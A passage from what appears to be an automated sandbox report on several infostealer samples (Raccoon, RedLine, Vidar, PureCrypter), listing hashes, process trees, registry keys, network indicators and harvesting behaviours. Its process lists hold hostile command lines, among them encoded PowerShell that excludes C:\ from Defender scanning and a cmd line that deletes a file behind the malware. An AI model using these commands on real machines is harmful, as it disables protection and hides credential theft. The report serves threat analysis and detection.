| SHA1 | 90beb8d419b83bd76924826725a14c03b3e6533f |
| SHA256 | 18be33f7c9f28b0a514f3f40983f452f476470691b1be4f2aba5ba5e06c6a345 |
| SHA512 | 8ff86e4b4d9cb5e2e88826a822457cb863262e3b73645c0c3309f13fb496997e53005ebe1825c6f92463c6642ec9abc6bbe359b35410b0621649b8d3aaf66c71 |
memory/1516-130-0x00000000000D0000-0x00000000000DA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS8433607D\GenericSetup.LastScreen.dll
| MD5 | 3319432d3a694a481f5672fa9eb743d0 |
| SHA1 | 99bff8f4941eb3cee3e0a7cb86b89eda1df07bf9 |
| SHA256 | 768b4eb487e2dc8bcb8ec6221734ca69dce7f522d7640cc2a547f95296509693 |
| SHA512 | 7f2a1c6c8d9d135b9e00e04f715c9b6b8ba12cb317f7b78ee3efbe3e426a99afce022306eb5bf02fe51c13857d3943b2b009b10b9cc96683e6bcbca1f9045c7f |
\Users\Admin\AppData\Local\Temp\7zS8433607D\GenericSetup.LastScreen.dll
| MD5 | 3319432d3a694a481f5672fa9eb743d0 |
| SHA1 | 99bff8f4941eb3cee3e0a7cb86b89eda1df07bf9 |
| SHA256 | 768b4eb487e2dc8bcb8ec6221734ca69dce7f522d7640cc2a547f95296509693 |
| SHA512 | 7f2a1c6c8d9d135b9e00e04f715c9b6b8ba12cb317f7b78ee3efbe3e426a99afce022306eb5bf02fe51c13857d3943b2b009b10b9cc96683e6bcbca1f9045c7f |
memory/1516-134-0x0000000000370000-0x000000000037C000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zS8433607D\GenericSetup.LastScreen.dll
| MD5 | 3319432d3a694a481f5672fa9eb743d0 |
| SHA1 | 99bff8f4941eb3cee3e0a7cb86b89eda1df07bf9 |
| SHA256 | 768b4eb487e2dc8bcb8ec6221734ca69dce7f522d7640cc2a547f95296509693 |
| SHA512 | 7f2a1c6c8d9d135b9e00e04f715c9b6b8ba12cb317f7b78ee3efbe3e426a99afce022306eb5bf02fe51c13857d3943b2b009b10b9cc96683e6bcbca1f9045c7f |
C:\Users\Admin\AppData\Local\Temp\7zS8433607D\GenericSetup.dll
| MD5 | 4d65e6eb25db2ce61f4a7a48d9f6082a |
| SHA1 | 130abbae19f227b0ef4f278e90398b3b3c7c2eff |
| SHA256 | 1e2e26d769d69f6b06cad2f2fec81a125e4f3d14aee969357784fb533d80b89a |
| SHA512 | b0842b4fc07dd332c53f56f1337b32064dad7a15663397655b73061bf3d61b44ecdd47ed626b92e69383cfaa41a9c70d4a18ece79fdbab2daf1d06adb1be4bfb |
\Users\Admin\AppData\Local\Temp\7zS8433607D\GenericSetup.dll
| MD5 | 4d65e6eb25db2ce61f4a7a48d9f6082a |
| SHA1 | 130abbae19f227b0ef4f278e90398b3b3c7c2eff |
| SHA256 | 1e2e26d769d69f6b06cad2f2fec81a125e4f3d14aee969357784fb533d80b89a |
| SHA512 | b0842b4fc07dd332c53f56f1337b32064dad7a15663397655b73061bf3d61b44ecdd47ed626b92e69383cfaa41a9c70d4a18ece79fdbab2daf1d06adb1be4bfb |
\Users\Admin\AppData\Local\Temp\7zS8433607D\GenericSetup.dll
| MD5 | 4d65e6eb25db2ce61f4a7a48d9f6082a |
| SHA1 | 130abbae19f227b0ef4f278e90398b3b3c7c2eff |
| SHA256 | 1e2e26d769d69f6b06cad2f2fec81a125e4f3d14aee969357784fb533d80b89a |
| SHA512 | b0842b4fc07dd332c53f56f1337b32064dad7a15663397655b73061bf3d61b44ecdd47ed626b92e69383cfaa41a9c70d4a18ece79fdbab2daf1d06adb1be4bfb |
memory/1516-138-0x0000000004E60000-0x000000000553A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS8433607D\Ninject.dll
| MD5 | ce80365e2602b7cff0222e0db395428c |
| SHA1 | 50c9625eda1d156c9d7a672839e9faaea1dffdbd |
| SHA256 | 3475dd6f1612e984573276529d8147029d6bfa55d41bef2577b3aa601d2fbbe5 |
| SHA512 | 5ea1de091a108143bb74fccdb4f0553f72613e58d8551fff51ce1aab34636c856758719dfa1a0e4cc833acb8e75729793dede65c4562e1aa3f68ec50463d36f3 |
\Users\Admin\AppData\Local\Temp\7zS8433607D\Ninject.dll
| MD5 | ce80365e2602b7cff0222e0db395428c |
| SHA1 | 50c9625eda1d156c9d7a672839e9faaea1dffdbd |
| SHA256 | 3475dd6f1612e984573276529d8147029d6bfa55d41bef2577b3aa601d2fbbe5 |
| SHA512 | 5ea1de091a108143bb74fccdb4f0553f72613e58d8551fff51ce1aab34636c856758719dfa1a0e4cc833acb8e75729793dede65c4562e1aa3f68ec50463d36f3 |
\Users\Admin\AppData\Local\Temp\7zS8433607D\Ninject.dll
| MD5 | ce80365e2602b7cff0222e0db395428c |
| SHA1 | 50c9625eda1d156c9d7a672839e9faaea1dffdbd |
| SHA256 | 3475dd6f1612e984573276529d8147029d6bfa55d41bef2577b3aa601d2fbbe5 |
| SHA512 | 5ea1de091a108143bb74fccdb4f0553f72613e58d8551fff51ce1aab34636c856758719dfa1a0e4cc833acb8e75729793dede65c4562e1aa3f68ec50463d36f3 |
\Users\Admin\AppData\Local\Temp\7zS8433607D\Ninject.dll
| MD5 | ce80365e2602b7cff0222e0db395428c |
| SHA1 | 50c9625eda1d156c9d7a672839e9faaea1dffdbd |
| SHA256 | 3475dd6f1612e984573276529d8147029d6bfa55d41bef2577b3aa601d2fbbe5 |
| SHA512 | 5ea1de091a108143bb74fccdb4f0553f72613e58d8551fff51ce1aab34636c856758719dfa1a0e4cc833acb8e75729793dede65c4562e1aa3f68ec50463d36f3 |
\Users\Admin\AppData\Local\Temp\7zS8433607D\HtmlAgilityPack.dll
| MD5 | 7874850410e21b5f48bfe34174fb318c |
| SHA1 | 19522b1b9d932aa89df580c73ef629007ec32b6f |
| SHA256 | c6250da15c349033de9b910c3dc10a156e47d69ec7e2076ce9011af7f3d885d1 |
| SHA512 | dad611ca9779b594aad7898261cc7ef0db500850eb81560c04d5d938ae4e2338e786773f63f59aab6564ad13acb4800f1862a2189803cc8cc8ad26a368f25eaa |
\Users\Admin\AppData\Local\Temp\7zS8433607D\HtmlAgilityPack.dll
| MD5 | 7874850410e21b5f48bfe34174fb318c |
| SHA1 | 19522b1b9d932aa89df580c73ef629007ec32b6f |
| SHA256 | c6250da15c349033de9b910c3dc10a156e47d69ec7e2076ce9011af7f3d885d1 |
| SHA512 | dad611ca9779b594aad7898261cc7ef0db500850eb81560c04d5d938ae4e2338e786773f63f59aab6564ad13acb4800f1862a2189803cc8cc8ad26a368f25eaa |
\Users\Admin\AppData\Local\Temp\7zS8433607D\HtmlAgilityPack.dll
| MD5 | 7874850410e21b5f48bfe34174fb318c |
| SHA1 | 19522b1b9d932aa89df580c73ef629007ec32b6f |
| SHA256 | c6250da15c349033de9b910c3dc10a156e47d69ec7e2076ce9011af7f3d885d1 |
| SHA512 | dad611ca9779b594aad7898261cc7ef0db500850eb81560c04d5d938ae4e2338e786773f63f59aab6564ad13acb4800f1862a2189803cc8cc8ad26a368f25eaa |
\Users\Admin\AppData\Local\Temp\7zS8433607D\HtmlAgilityPack.dll
| MD5 | 7874850410e21b5f48bfe34174fb318c |
| SHA1 | 19522b1b9d932aa89df580c73ef629007ec32b6f |
| SHA256 | c6250da15c349033de9b910c3dc10a156e47d69ec7e2076ce9011af7f3d885d1 |
| SHA512 | dad611ca9779b594aad7898261cc7ef0db500850eb81560c04d5d938ae4e2338e786773f63f59aab6564ad13acb4800f1862a2189803cc8cc8ad26a368f25eaa |
memory/1516-148-0x00000000006C0000-0x00000000006EC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS8433607D\HtmlAgilityPack.dll
| MD5 | 7874850410e21b5f48bfe34174fb318c |
| SHA1 | 19522b1b9d932aa89df580c73ef629007ec32b6f |
| SHA256 | c6250da15c349033de9b910c3dc10a156e47d69ec7e2076ce9011af7f3d885d1 |
| SHA512 | dad611ca9779b594aad7898261cc7ef0db500850eb81560c04d5d938ae4e2338e786773f63f59aab6564ad13acb4800f1862a2189803cc8cc8ad26a368f25eaa |
memory/1516-142-0x00000000003E0000-0x0000000000408000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zS8433607D\Ninject.dll
| MD5 | ce80365e2602b7cff0222e0db395428c |
| SHA1 | 50c9625eda1d156c9d7a672839e9faaea1dffdbd |
| SHA256 | 3475dd6f1612e984573276529d8147029d6bfa55d41bef2577b3aa601d2fbbe5 |
| SHA512 | 5ea1de091a108143bb74fccdb4f0553f72613e58d8551fff51ce1aab34636c856758719dfa1a0e4cc833acb8e75729793dede65c4562e1aa3f68ec50463d36f3 |
Analysis: behavioral4
Detonation Overview
Submitted
2023-01-15 17:11
Reported
2023-01-15 17:16
Platform
win10v2004-20221111-en
Max time kernel
124s
Max time network
138s
Command Line
Signatures
PureCrypter
Raccoon
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe | N/A |
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\infected\Installer.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\infected\Installer.exe | N/A |
Checks installed software on the system
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 364 set thread context of 5032 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\infected\Installer.exe
"C:\Users\Admin\AppData\Local\Temp\infected\Installer.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwA3AA==
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
Network
| Country | Destination | Domain | Proto |
| N/A | 20.189.173.15:443 | tcp | |
| N/A | 8.8.8.8:53 | falcaoliderfm.com.br | udp |
| N/A | 192.185.216.127:443 | falcaoliderfm.com.br | tcp |
| N/A | 178.79.208.1:80 | tcp | |
| N/A | 178.79.208.1:80 | tcp | |
| N/A | 178.79.208.1:80 | tcp | |
| N/A | 93.184.221.240:80 | tcp | |
| N/A | 93.184.220.29:80 | tcp | |
| N/A | 77.73.133.23:80 | 77.73.133.23 | tcp |
Files
memory/364-132-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe
| MD5 | d57db4d9896f6a1b0f72e4503ba94ed0 |
| SHA1 | e4dc13b4c7ee490bd268e2241f8812cb3e3d5744 |
| SHA256 | 6a320e135997a07575d8433261146653b3b5c6dd71195ba5e0f892d20a85a09d |
| SHA512 | ad99c68a7c31df3d26f195e758e76aed1a4a00f4ef4ad25af5812e3be27940a3002428ec21121be54e47f13ec3145b5c46568e83ff98898f8a52aef8884bea52 |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe
| MD5 | d57db4d9896f6a1b0f72e4503ba94ed0 |
| SHA1 | e4dc13b4c7ee490bd268e2241f8812cb3e3d5744 |
| SHA256 | 6a320e135997a07575d8433261146653b3b5c6dd71195ba5e0f892d20a85a09d |
| SHA512 | ad99c68a7c31df3d26f195e758e76aed1a4a00f4ef4ad25af5812e3be27940a3002428ec21121be54e47f13ec3145b5c46568e83ff98898f8a52aef8884bea52 |
memory/364-135-0x00000000000A0000-0x00000000000A8000-memory.dmp
memory/364-136-0x0000000004F10000-0x00000000054B4000-memory.dmp
memory/364-137-0x0000000004A50000-0x0000000004AE2000-memory.dmp
memory/364-138-0x0000000004C00000-0x0000000004C0A000-memory.dmp
memory/364-139-0x0000000007EB0000-0x0000000007ED2000-memory.dmp
memory/1180-140-0x0000000000000000-mapping.dmp
memory/1180-141-0x0000000002F60000-0x0000000002F96000-memory.dmp
memory/1180-142-0x00000000056F0000-0x0000000005D18000-memory.dmp
memory/1180-143-0x0000000005E90000-0x0000000005EF6000-memory.dmp
memory/1180-144-0x0000000005F00000-0x0000000005F66000-memory.dmp
memory/1180-145-0x0000000006500000-0x000000000651E000-memory.dmp
memory/1180-146-0x0000000007E10000-0x000000000848A000-memory.dmp
memory/1180-147-0x0000000006A40000-0x0000000006A5A000-memory.dmp
memory/1020-148-0x0000000000000000-mapping.dmp
memory/5032-149-0x0000000000000000-mapping.dmp
memory/5032-150-0x0000000000400000-0x000000000041E000-memory.dmp
memory/372-151-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe
| MD5 | d57db4d9896f6a1b0f72e4503ba94ed0 |
| SHA1 | e4dc13b4c7ee490bd268e2241f8812cb3e3d5744 |
| SHA256 | 6a320e135997a07575d8433261146653b3b5c6dd71195ba5e0f892d20a85a09d |
| SHA512 | ad99c68a7c31df3d26f195e758e76aed1a4a00f4ef4ad25af5812e3be27940a3002428ec21121be54e47f13ec3145b5c46568e83ff98898f8a52aef8884bea52 |
memory/5032-154-0x0000000000400000-0x000000000041E000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 4280e36a29fa31c01e4d8b2ba726a0d8 |
| SHA1 | c485c2c9ce0a99747b18d899b71dfa9a64dabe32 |
| SHA256 | e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359 |
| SHA512 | 494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 8ad6260b5656f92436334157a2a08961 |
| SHA1 | d1fe686740e0b72d1cfb956673c7293fba05869a |
| SHA256 | 9c475d6c0f06a27bff2ebf8b3749a4135ae52bf9259029c16c4d3668232bfd80 |
| SHA512 | 65ec7c87e1e9636e7a27a9ba51b6ce3b6b92e4245a2ef504c895818f29cb9486c0f43cb52750c692e17eda6205058cc29eb2d5de742b203b710fdee19d61ae45 |
memory/5032-157-0x0000000000400000-0x000000000041E000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | 06ad34f9739c5159b4d92d702545bd49 |
| SHA1 | 9152a0d4f153f3f40f7e606be75f81b582ee0c17 |
| SHA256 | 474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba |
| SHA512 | c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92 |
memory/372-159-0x0000000006960000-0x0000000006992000-memory.dmp
memory/372-160-0x0000000070D90000-0x0000000070DDC000-memory.dmp
C:\Users\Admin\AppData\LocalLow\sqlite3.dll
| MD5 | dbf4f8dcefb8056dc6bae4b67ff810ce |
| SHA1 | bbac1dd8a07c6069415c04b62747d794736d0689 |
| SHA256 | 47b64311719000fa8c432165a0fdcdfed735d5b54977b052de915b1cbbbf9d68 |
| SHA512 | b572ca2f2e4a5cc93e4fcc7a18c0ae6df888aa4c55bc7da591e316927a4b5cfcbdda6e60018950be891ff3b26f470cc5cce34d217c2d35074322ab84c32a25d1 |
C:\Users\Admin\AppData\LocalLow\nss3.dll
| MD5 | f67d08e8c02574cbc2f1122c53bfb976 |
| SHA1 | 6522992957e7e4d074947cad63189f308a80fcf2 |
| SHA256 | c65b7afb05ee2b2687e6280594019068c3d3829182dfe8604ce4adf2116cc46e |
| SHA512 | 2e9d0a211d2b085514f181852fae6e7ca6aed4d29f396348bedb59c556e39621810a9a74671566a49e126ec73a60d0f781fa9085eb407df1eefd942c18853be5 |
C:\Users\Admin\AppData\LocalLow\mozglue.dll
| MD5 | f07d9977430e762b563eaadc2b94bbfa |
| SHA1 | da0a05b2b8d269fb73558dfcf0ed5c167f6d3877 |
| SHA256 | 4191faf7e5eb105a0f4c5c6ed3e9e9c71014e8aa39bbee313bc92d1411e9e862 |
| SHA512 | 6afd512e4099643bba3fc7700dd72744156b78b7bda10263ba1f8571d1e282133a433215a9222a7799f9824f244a2bc80c2816a62de1497017a4b26d562b7eaf |
memory/372-164-0x0000000006930000-0x000000000694E000-memory.dmp
memory/372-165-0x0000000007720000-0x000000000772A000-memory.dmp
memory/372-166-0x0000000007970000-0x0000000007A06000-memory.dmp
memory/372-167-0x0000000006A10000-0x0000000006A1E000-memory.dmp
memory/372-168-0x00000000078D0000-0x00000000078EA000-memory.dmp
memory/372-169-0x00000000078B0000-0x00000000078B8000-memory.dmp
memory/5032-170-0x0000000000400000-0x000000000041E000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2023-01-15 17:11
Reported
2023-01-15 17:17
Platform
win7-20221111-en
Max time kernel
142s
Max time network
154s
Command Line
Signatures
RedLine
Uses the VBS compiler for execution
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 568 set thread context of 520 | N/A | C:\Users\Admin\AppData\Local\Temp\infected\RobloxSynapceX Cracked.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\infected\RobloxSynapceX Cracked.exe |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\infected\RobloxSynapceX Cracked.exe
"C:\Users\Admin\AppData\Local\Temp\infected\RobloxSynapceX Cracked.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 568 -s 36
Network
| Country | Destination | Domain | Proto |
| N/A | 82.115.223.46:57672 | tcp |
Files
memory/520-56-0x0000000000400000-0x0000000000430000-memory.dmp
memory/520-54-0x0000000000400000-0x0000000000430000-memory.dmp
memory/520-61-0x000000000041BCAE-mapping.dmp
memory/568-62-0x0000000000370000-0x00000000003F7000-memory.dmp
memory/520-63-0x0000000000400000-0x0000000000430000-memory.dmp
memory/520-64-0x0000000000400000-0x0000000000430000-memory.dmp
memory/1448-65-0x0000000000000000-mapping.dmp
memory/520-66-0x0000000075491000-0x0000000075493000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2023-01-15 17:11
Reported
2023-01-15 17:16
Platform
win7-20221111-en
Max time kernel
26s
Max time network
34s
Command Line
Signatures
Vidar
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1800 set thread context of 296 | N/A | C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe
"C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe"
Network
Files
memory/1800-54-0x0000000000CB0000-0x000000000171E000-memory.dmp
memory/1800-55-0x000000001C240000-0x000000001C49E000-memory.dmp
memory/296-56-0x0000000000400000-0x0000000000460000-memory.dmp
memory/296-57-0x0000000000400000-0x0000000000460000-memory.dmp
memory/296-59-0x0000000000400000-0x0000000000460000-memory.dmp
memory/296-61-0x0000000000400000-0x0000000000460000-memory.dmp
memory/296-63-0x0000000000400000-0x0000000000460000-memory.dmp
memory/296-65-0x0000000000400000-0x0000000000460000-memory.dmp
memory/296-66-0x0000000000421BEC-mapping.dmp
memory/296-68-0x0000000000400000-0x0000000000460000-memory.dmp
memory/296-69-0x0000000000400000-0x0000000000460000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2023-01-15 17:11
Reported
2023-01-15 17:16
Platform
win10v2004-20220812-en
Max time kernel
140s
Max time network
158s
Command Line
Signatures
Vidar
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A |
Accesses 2FA software files, possible credential harvesting
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2512 set thread context of 4888 | N/A | C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe
"C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 6
Network
| Country | Destination | Domain | Proto |
| N/A | 93.184.220.29:80 | tcp | |
| N/A | 8.8.8.8:53 | t.me | udp |
| N/A | 149.154.167.99:443 | t.me | tcp |
| N/A | 49.12.113.110:80 | 49.12.113.110 | tcp |
| N/A | 95.101.78.82:80 | tcp | |
| N/A | 95.101.78.82:80 | tcp | |
| N/A | 104.80.225.205:443 | tcp | |
| N/A | 51.11.192.48:443 | tcp |
Files
memory/2512-132-0x0000000000D90000-0x00000000017FE000-memory.dmp
memory/2512-133-0x00007FFCC3CB0000-0x00007FFCC4771000-memory.dmp
memory/4888-134-0x0000000000400000-0x0000000000460000-memory.dmp
memory/4888-135-0x0000000000421BEC-mapping.dmp
memory/4888-136-0x0000000000400000-0x0000000000460000-memory.dmp
memory/4888-137-0x0000000000400000-0x0000000000460000-memory.dmp
memory/2512-138-0x00007FFCC3CB0000-0x00007FFCC4771000-memory.dmp
memory/4888-139-0x0000000000400000-0x0000000000460000-memory.dmp
memory/4888-140-0x0000000000400000-0x0000000000460000-memory.dmp
memory/4888-141-0x0000000051270000-0x0000000051302000-memory.dmp
C:\ProgramData\nss3.dll
| MD5 | bfac4e3c5908856ba17d41edcd455a51 |
| SHA1 | 8eec7e888767aa9e4cca8ff246eb2aacb9170428 |
| SHA256 | e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78 |
| SHA512 | 2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66 |
C:\ProgramData\mozglue.dll
| MD5 | 8f73c08a9660691143661bf7332c3c27 |
| SHA1 | 37fa65dd737c50fda710fdbde89e51374d0c204a |
| SHA256 | 3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd |
| SHA512 | 0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89 |
memory/2392-162-0x0000000000000000-mapping.dmp
memory/4888-163-0x0000000000400000-0x0000000000460000-memory.dmp
memory/1828-164-0x0000000000000000-mapping.dmp